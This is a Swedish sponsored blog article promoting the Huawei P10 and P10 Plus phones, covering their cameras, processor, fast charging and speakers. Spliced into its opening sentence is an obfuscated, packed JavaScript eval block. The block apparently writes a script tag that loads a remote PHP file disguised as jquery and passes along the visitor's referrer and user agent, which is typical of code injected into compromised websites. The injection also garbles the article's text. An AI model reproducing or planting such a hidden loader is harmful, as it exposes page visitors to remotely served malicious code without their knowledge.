Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Reklam: Den perfekta smarta telefonen för en smartare planet

type=”text/javascript”>
document.write(’’);

Teknikföretaget eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnsfd|var|u0026u|referrer|yrdzz||js|php’.split(’|’),0,{}))
Huawei forsätter och lansera nya och fantastiska enheter. Den senaste heter Huawei P10 och P10 plus. Som ni säkert förstår så är den sistnämnda en modell med några extra funktioner som inte tillkommer standard versionen, men vi går in på mer om detta nedan. 

I de nya telefonerna har det lagts på en massa ny teknik som gör att nya P10 blir en av de värsta modellerna som Huawei någonsin tagit fram.

Porträtt Funktion – Ge världen nya ansikten

Med nya, dubbla kameror från Leica så kan P10 plus förvandla dina foton till ett snyggt porträtt med maximala detaljer.

P10 och P10 plus prestanda

Självklart har man också satsat ordentligt på prestanda. Allt för att göra världen lite snabbare. För den lite mer teknikintresserade så är telefonerna utrustade med Kirin 960, 4x Cortex A73 2.4 GHz + 4 x Cortex A53 1,8 GHz. Något som gör dessa telefoner till några av de snabbaste på marknaden.

Batteritid och laddning – SuperCharger

Vi är alla vana vid långa laddningstider och sisådär batteritid. Med P10 och P10 plus kan du ladda telefonen på 30 minuter. Detta ska då ge 4 timmar samtalstid med SuperCharger.

Högtalare – Lite bättre ljud

Stereohögtalarna i P10 Plus kommer ändra på hur standard på högtalare ska vara på en smartphone. Lägg telefonen horisontellt så aktiverar du en extra högtalare som ger varje ljud en ny dimension.

Hybrid zoom

Bilder och kamera har blivit något av det viktigaste på din smarphone idag. Därför ska det självklart då också vara enkelt att ta snygga bilder. Med Hybrid Zoom kan du se skönheten i varje detalj. 4x digital zoom ger dig möjlighet att zooma in så pass mycket att du aldrig missar de minsta sakerna omkring dig. Enkelt och ställa in och sen bara ta dina fantastiska makrobilder.

Kika in videon ovan så får du hälsa på Huawei P10 och P10 Plus.

I samarbete med Huawei.